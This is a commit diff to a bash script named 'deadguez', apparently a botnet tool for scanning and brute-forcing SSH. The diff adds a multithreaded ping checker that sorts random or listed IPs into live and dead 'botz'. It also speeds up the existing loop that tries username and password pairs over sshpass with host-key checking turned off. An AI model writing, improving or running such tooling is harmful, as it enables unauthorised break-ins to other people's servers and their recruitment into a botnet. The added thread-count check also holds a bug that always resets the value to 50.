update deadguez

diff --git a/deadguez b/deadguez
--- a/deadguez
+++ b/deadguez
@@ -37,6 +37,28 @@ function _IP_Generator() {
 	done 2> /dev/null
 }
 
+function _IP_Checker() {
+	ping -q -c1 ${X} > /dev/null
+	if [[ $? -eq 0 ]]; then
+		printf " ${BD}${WH}[${GR}+${WH}] ${WH}[${GR}${X}${WH}] - ${WH}[${GR}Botz Live${WH}]${NT}\n"
+		echo "${X}" >> ${date}_live.txt
+	else
+		printf " ${BD}${WH}[${RD}-${WH}] ${WH}[${RD}${X}${WH}] - ${WH}[${RD}Botz Die${WH}]${NT}\n"
+	fi &
+}
+
+function _Run_IP_Checker(){
+	for X in $(cat ${IP_LIST}); do
+		FAST=$(expr $CON % $THREADS)
+		if [[ $FAST == 0 && $CON > 0 ]]; then
+			sleep 2
+		fi
+		_IP_Checker &
+		CON=$[$CON+1]
+	done
+	wait
+}
+
 function _Attack_SSH() {
 	# Function of login SSH
 	local GO_ATTACK=$(sshpass -p "${PASSLIST}" ssh -o StrictHostKeyChecking=no "${USERLIST}"@"${IPLIST}" -p ${PORT} uname -a 2> /dev/null | grep -c "0");
@@ -55,6 +77,7 @@ function _Help() {
 	printf "\n ${BD}${CY}══════════════════════════════════════════════════${NT}\n"
 	printf " ${WH}!help                | For more information\n"
 	printf " !generate            | Generate IP randomly\n"
+	printf " !check               | Check if IP Address is available\n"
 	printf " !attack              | Start attacking SSH\n"
 	printf " !botz                | Display the total botz connected\n"
 	printf " !clear               | Clear terminal screen\n"
@@ -75,6 +98,20 @@ while true; do
 		else
 			printf " ${BD}${WH}[${RD}-${WH}] ${RD}Unsuccessful generate IP Address${NT}\n"
 		fi
+	elif [[ $opt == "!check" ]]; then
+		# IP List
+		echo -ne "\n ${WH}[${RD}?${WH}] ${CY}IP List: ${WH}"; read IP_LIST;
+		if [[ ! -e $IP_LIST ]]; then
+			printf " ${RD}[!] ${YW}File Not Found\n"
+			./${0}
+		fi
+		# Total Threads
+		read -p " ${WH}[${RD}?${WH}] ${CY}Threads (Default 50): ${WH}" THREADS;
+		if [[ $THREADS="" ]]; then
+			THREADS=50
+		fi
+		printf "\n\t${WH}[ ${CY}IP Checker ${BD}${GR}ON ${NT}${WH}]\n\n"
+		_Run_IP_Checker
 	elif [[ $opt == "!attack" ]]; then
 		# IP List
 		echo -ne "\n ${WH}[${RD}?${WH}] ${CY}IP List: ${WH}"; read IP_LIST;
@@ -113,9 +150,9 @@ while true; do
 		for IPLIST in $(cat $IP_LIST); do
 			for USERLIST in $(cat $USER_LIST); do
 				for PASSLIST in $(cat $PASS_LIST); do
-					fast=$(expr $CON % $THREADS)
-					if [[ $fast == 0 && $CON > 0 ]]; then
-						sleep 3
+					FAST=$(expr $CON % $THREADS)
+					if [[ $FAST == 0 && $CON > 0 ]]; then
+						sleep 1
 					fi
 					_Attack_SSH &
 					CON=$[$CON+1]
